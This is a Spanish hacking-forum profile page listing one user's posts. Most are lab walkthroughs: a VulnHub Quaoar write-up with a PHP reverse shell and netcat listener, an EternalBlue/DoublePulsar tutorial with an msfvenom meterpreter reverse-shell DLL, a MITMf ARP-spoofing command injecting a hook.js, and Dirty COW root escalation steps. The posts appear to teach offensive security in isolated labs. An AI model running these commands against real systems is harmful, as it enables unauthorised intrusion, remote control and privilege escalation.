Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - Stuxnet

Páginas: [1] 2 3 ... 16
1
la membrecia es opcional, un 90% del contenido es gratuito

2
Hacking / Tryhackme - Una nueva plataforma para enseñar y aprender hacking
« en: Noviembre 08, 2019, 01:42:11 pm »

Hola underc0de xD después de años sin publicar nada :v espero que no lo tomen como spam :3


La plataforma desarrolla aulas virtuales que no solo permiten a los usuarios implementar entornos de formación con solo hacer clic en un botón, sino también reforzar el aprendizaje mediante la adición de un enfoque de preguntas y respuestas. Es una experiencia cómoda para aprender mediante cursos prediseñados que incluyen máquinas virtuales (VM) hospedadas en la nube.

Mientras que el uso de un modelo de preguntas-respuesta hace que el aprendizaje sea más fácil, TryHackMe permite a los usuarios crear sus propias aulas virtuales para enseñar temas particulares que les permiten convertirse en profesores. Esto no sólo proporciona a otros usuarios contenido rico y variado, sino que también ayuda a los creadores a reforzar su comprensión de los conceptos fundamentales.

TryHackMe es muy adecuado para cualquier tipo de CTF, talleres y evaluaciones de formación, la plataforma está siendo utilizada por un concurso de la Universidad del Reino Unido llamado "HackBack", sólo una de las 12 universidades diferentes que TryHackMe ha participado!

Los concursos se centran en varias categorías de seguridad, entre ellas:

  • Explotación Web
    Forense
    OSINT
    Scripting
    Redes
    Ingeniería inversa

Algunas organizaciones privadas están utilizando la plataforma para evaluar a los entrevistados sobre su capacidad y para ayudarles a poner en la lista blanca a los empleados potenciales.

Completar las salas contribuye a completar "Objetivos", que son objetivos establecidos por TryHackMe. Por ejemplo, algunas salas pueden ayudar a prepararse para el examen OSCP.

tryhackme

Porque tryhackme y no hack the box (Que es otra excelente opción) Pues como menciono en el post lo que busca es que usuarios nuevos aprendan desde lo basico.


PD: Un saludo para todo los que conocen ): los extraño ..... xD

4
Off Topic / Ekoparty
« en: Septiembre 24, 2017, 02:07:56 pm »
Bien, este año me ire para la eko, asi que por si alguien más va y se pueda cuadrar un almuerzo o algunos retos sería perfecto.

telegram: @Stuxnet

Un saludo.


5
Hacking / Re:Eternal - Un escáner para Eternal Blue
« en: Julio 23, 2017, 09:57:44 pm »
Para los amantes de nmap aqui esta el script nse que identifica este bug

https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/smb-vuln-ms17-010.nse

6
Soluciones de Wargames / hackfest2016: Quaoar - [ Walkthrough ]
« en: Julio 19, 2017, 12:12:45 pm »

En este tutorial vamos a resolver la maquina virtual hackfest2016: Quaoar la cual la pueden descargar desde vulnhub.

Viendo la descripción de la maquina virtual pide que encontremos 3 flags.

Código: Text
  1. There are 3 flags on this machine
  2.  
  3. 1. Get a shell
  4. 2. Get root access
  5. 3. There is a post exploitation flag on the box

Código: Text
  1. Laboratorio:
  2. Atacante Kali: 192.168.1.100
  3. Victima Quaoar: 192.168.1.101

Escaneo:


Como vemos tenemos un apache corriendo en el 80.


Buscando directorios con nmap


Genial tenemos un wordpress. Ahora le pasare un scanner conocido como cmsmap


Al poco tiempo del scaneo nos mostrará que el sitio esta utilizando contraseñas por defecto que serian admin:admin así que vamos a omitir cualquier explotación de vulnerabilidades web y obtendremos acceso al equipo mediante una reverse shell en php.

Ingresando al administrador del blog

Código: Text
  1. user: admin
  2. password:admin

Una vez echo esto, nos vamos al appearance --> editor  --> 404.php, la página 404 es la que tendra la reverse shell que voy a utilizar que será una de pentestmonkey.


Procedemos a modificar la reverse shell.

Código: Text
  1. $ip = '127.0.0.1';  // CHANGE THIS
  2. $port = 1234;       // CHANGE THIS

IP Atacante: 192.168.1.100
Por: lo dejare por defecto.

Ahora pondremos a la escucha nuestro netcat

Código: Text
  1. nc -v -n -l -p 1234

Al ingresar a la dirección de la página 404 obtendremos acceso al sistema, la url seria http://192.168.1.101/wordpress/wp-content/themes/twentyfourteen/404.php. twentyfourteen es el theme que se esta utilizando en el sitio.


Flag: 1. Get a shell


Con el comando locate voy a buscar el archivo flag.txt, al hacer eso nos dice que se encuentra en la carpeta /home/wpadmin/, después solo vere su contenido con el comando cat.

Flag 2. Get root access

Como el sitio esta en wordpress se me ocurrio hacerle un cat al archivo wp-config.php muchas veces colocan por ahi la password root


Genial la contraseña es: rootpassword!

Ahora voy a obtener una bash con el siguiente comando.

Código: Text
  1. python -c 'import pty;pty.spawn("/bin/bash")'


Yeaaa! como podemos ver, en la carpeta root se encuentra la segunda flag.

Flag 3. There is a post exploitation flag on the box.

Sin duda esta fué la que me tomo más tiempo, para encontra esta flag utilice de recurso Linux Post Exploitation Command List después de un rato leyendo el repositorio hago un cat sobre  /etc/crontab

Código: Text
  1. Crontab es un simple archivo de texto que guarda una lista de comandos a ejecutar en un tiempo especificado por el usuario


Nada de flag ):, ahora me iré a ver la carperta cron.d en el directorio etc.


Fuck yea! Al hacerle un cat al archivo php5 que se encontraba en la carpeta nos arroja información y un texto md5 cual es la ultima flag.

7
Solo vean esto y ya.


8
Dudas y pedidos generales / Re:exploit eternal blue y carpeta deps
« en: Junio 20, 2017, 10:42:13 am »
El modulo oficial de metasploit es el siguiente
Código: [Seleccionar]
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue , si tienes tu equipo con las actualizaciones al día ya deberias de tenerlo

Saludos,

9
Wargames y retos / DevelReto
« en: Junio 18, 2017, 01:33:25 pm »
Hola comunidad aquí les dejo un pequeño reto que acabo de hacer, espero se diviertan esta muy entretenido, cualquier duda me hablan por mensaje. Y la solución me la envian por privado saludos.

https://mega.nz/#!oxwj1SLT!xqlmt-2MLjpbnPuGqDGhgv7ggqH31MTVzz91NDIy-QA

10
Hacking / Re:Hackeando como la nsa
« en: Abril 24, 2017, 04:05:52 pm »
No he dicho en ningún momento que te basaras en ese paper, lo siento si no me explique bien. He dicho que muchos sitios están sacando artículos sobre explotación de Eternalblue y Doublepulsar y que el "original" me parecía más completo. Puse original entre comillas porque he visto tanto cosas bastante interesantes, que quizá ni sabían de la existencia del de Sheila a verdaderas copias descaradas.

Lo original es de este tipo que mis respetos https://twitter.com/hackerfantastic :3

11
Hacking / Re:Hackeando como la nsa
« en: Abril 23, 2017, 08:38:47 pm »
No me base en ningun sitio desde hace tiempos que hice mis pruebas, date cuenta en la generaion del payload es totalmente diferente. y si comparas la hora de la publicación es totalmente diferente pero bueno xD por esto ya no publico nada.

12
Hacking / Hackeando como la nsa
« en: Abril 23, 2017, 04:41:28 pm »

Buenas en este pequeño post, explotaremos una vulnerabilidad de Ejecución de codigo remoto en smb de windows descubierta por la nsa.
Desde hace unos días el grupo shadowbroker ha liberado nuevos exploits que afectan windows, SWIFT etc.

Las vulnerabilidades en windows son las siguientes:


Requerimientos:

Kali linux - Atacante -- 192.168.1.100
Windows XP - Atacante -- 192.168.1.102
Windows 7  - Victima  -- 192.168.1.101

Fuzzbunch ha sido el nombre de este framework con los multiples exploits de windows "El mestasploit de la nsa". Programado en python 2.6  y utiliza una versión antigua de pywin32.

Montando nuestro laboratorio.

En windows XP instalamos python 2.6 https://www.python.org/download/releases/2.6/ recomiendo moficar el path con la ruta de la carpeta de python2.6, la version antigua de pywin32 https://sourceforge.net/projects/pywin32/files y ahora descargamos el leak de exploits. https://github.com/misterch0c/shadowbroker

Nos enfocamos en la carpeta windows y procederemos a modificar Fuzzbunch.xml Linea 19 y linea 24 colocaremos la ruta de la carpeta de Resources en mi caso C:\nsa\shadowbroker\windows\Resources y la de Logs en la 24 C:\nsa\shadowbroker\windows\Logs.

Ahora vamos a editar fb.py comentando las lineas 26 y 72 o si no quieren comentar unicamente creen una carpeta con el nombre listeningposts dentro de la carpeta windows.

Bien ahora desde cmd nos ubicamos en la carpeta windows y ejecutamos: python fb.py



Primero pondremos la Ip victima.
Segundo pondremos la ip atacante windows xp
Tercero pondremos no en redireccion.



Bien despues precionamos enter, y procedemos a crear un proyecto nuevo con el nombre de underc0de.



Bien ahora vamos a usar el comando "use" para ver todo el arsenal de Fuzzbunch



Bien, usaremos el exploit "EternalBlue"



Bien, ahora procedemos a dejar todo por defecto, precionando enter.



Hasta llegar a esta parte donde vamos a cambiar la opcion 0 por 1



Bien ahora seguiremos precionando enter, y si todo salio bien.



Fuuuuuuuuuuuuck yea!!! Exploiting con exito.

Bien ahora usaremos otro genial función de Fuzzbunch DoublePulsar, para inyectar remotamente una DLL maliciosa, para eso la vamos a generar con msfvenom.

Código: Text
  1. msfvenom --platform Windows -p windows/meterpreter/reverse_tcp --arch x86 -f dll LHOST=192.168.1.100 LPORT=4444 > /root/nsa.dll

Nota: La dll se genero para la plataforma de windows x86

Ahora configuramos nuestro handler en metasploit.



Bien ahora copiamos nuestra dll a windows xp y ejecutamos lo siguiente



En mi caso dejare todo por defecto porque tengo la arquitectura x86
Bien ahora en este caso vamos a elejir la opcion 2 y luego nos pedira la ruta de nuestra dll.



Bien ahora, como siempre todo por defecto precionando enter, y si todo salio perfectamente les saldria esto



y en metasploit



fuck yeaaa!!! Sesion meterpreter sobre windows sin intervencion del usuario.

Recomendaciones.

Actualizar su sistema.

13
Dudas y pedidos generales / Re:Fake AP easy creds
« en: Marzo 28, 2017, 11:10:32 am »
Hola, leyendo lo que quieres hacer imagino que quieres hacer un punto de acceso con tu ordenador y compartir internet, prueba con esta herramienta ---> wifi pumpkin, ya nos cuentas :P

Lo puedes hacer con la herramienta antes mencionada o lo puedes hacer manualmente siguiendo este video.


14
Una consulta, en las paginas con https también sirve?

Intenta agregando --hsts

Código: Text
  1. mitmf --hsts --spoof --arp -i INTERFACE --gateway 192.168.1.1 --inject --js-url [url]http://192.168.1.100:3000/hook.js[/url]

Aparte te aconsejo tener la version de Twisted 15.5.0

Código: Text
  1. pip install Twisted==15.5.0

15
Hacking / Re:[Tutorial] Como hacer un BAD USB (Un Rubber Ducky USB)
« en: Enero 29, 2017, 01:43:13 pm »
Muy bueno aunque sea c/p

Salu2

16
sigo igual
apt-get install lib32stdc++6 lib32ncurses5 and lib32z1
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
E: No se ha podido localizar el paquete lib32stdc++6
E: No se pudo encontrar ningún paquete con la expresión regular «lib32stdc++6»
E: No se ha podido localizar el paquete lib32ncurses5
E: No se ha podido localizar el paquete lib32z1

Deberias realizar un apt-get update a tu sistema porque los paquetes no tienen ningun error

Código: Text
  1. [email protected]:~$ apt-get install lib32stdc++6 lib32ncurses5 lib32z1
  2. Leyendo lista de paquetes... Hecho
  3. Creando árbol de dependencias      
  4. Leyendo la información de estado... Hecho
  5. Se instalarán los siguientes paquetes adicionales:
  6.   lib32gcc1 lib32tinfo5 libc6-i386
  7. Se instalarán los siguientes paquetes NUEVOS:
  8.   lib32gcc1 lib32ncurses5 lib32stdc++6 lib32tinfo5 lib32z1 libc6-i386
  9. 0 actualizados, 6 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
  10. Se necesita descargar 3,536 kB de archivos.
  11. Se utilizarán 14.5 MB de espacio de disco adicional después de esta operación.
  12. ¿Desea continuar? [S/n]
  13.  

17
Nuevo local exploit para la version del kernel 4.4.0

https://www.exploit-db.com/exploits/40871/

18
Ya la había publicado un post sobre esto :v

19
Noticias Informáticas / Re:Metasploitable3
« en: Noviembre 22, 2016, 10:59:44 am »
Antes que pregunten


20
Bugs y Exploits / Dirty COW: Elevación de Privilegios en Linux
« en: Octubre 28, 2016, 01:15:01 pm »

Hace unos dias el investigador Phil Oester dio a conocer la vulnerabilidad Dirty COW (copy on write) la cual nos permite elevar privilegios en sistemas linux en otras palabras, un usuario local sin privilegios podría utilizar esta vulnerabilidad para escribir y tener acceso a partes del sistema que son de otros usuarios, incluido el root.


Ya existe un exploit público en exploit-db para poder explotar dicha aprovecha. Aparte en Github se ha montado un repositorio sobre todas las pruebas de concepto. 

PoC: Exploit DirtyCOW (Ubuntu 14.04 y Ubuntu 15.10)

Comprobación de versión del Kernel con el comando uname -a

Ubuntu 14.04

Ubuntu 15.10


Una vez descargado el exploit procedemos a comentar el payload generado con msfvenom, si estamos en un sistema x86, debemos comentar el payload  para x64 y si nos encontramos en un sistema x64 seria al revés.


Compilando el exploit, esta escrito en C.

Código: Text
  1. gcc 40616.c -o 40616 -pthread

Ahora ejecutamos.

Código: Text
  1. ./40616

Elevación a usuario root en Ubuntu 14.04

Elevación a usuario root en Ubuntu 15.10

Bytes:3

Páginas: [1] 2 3 ... 16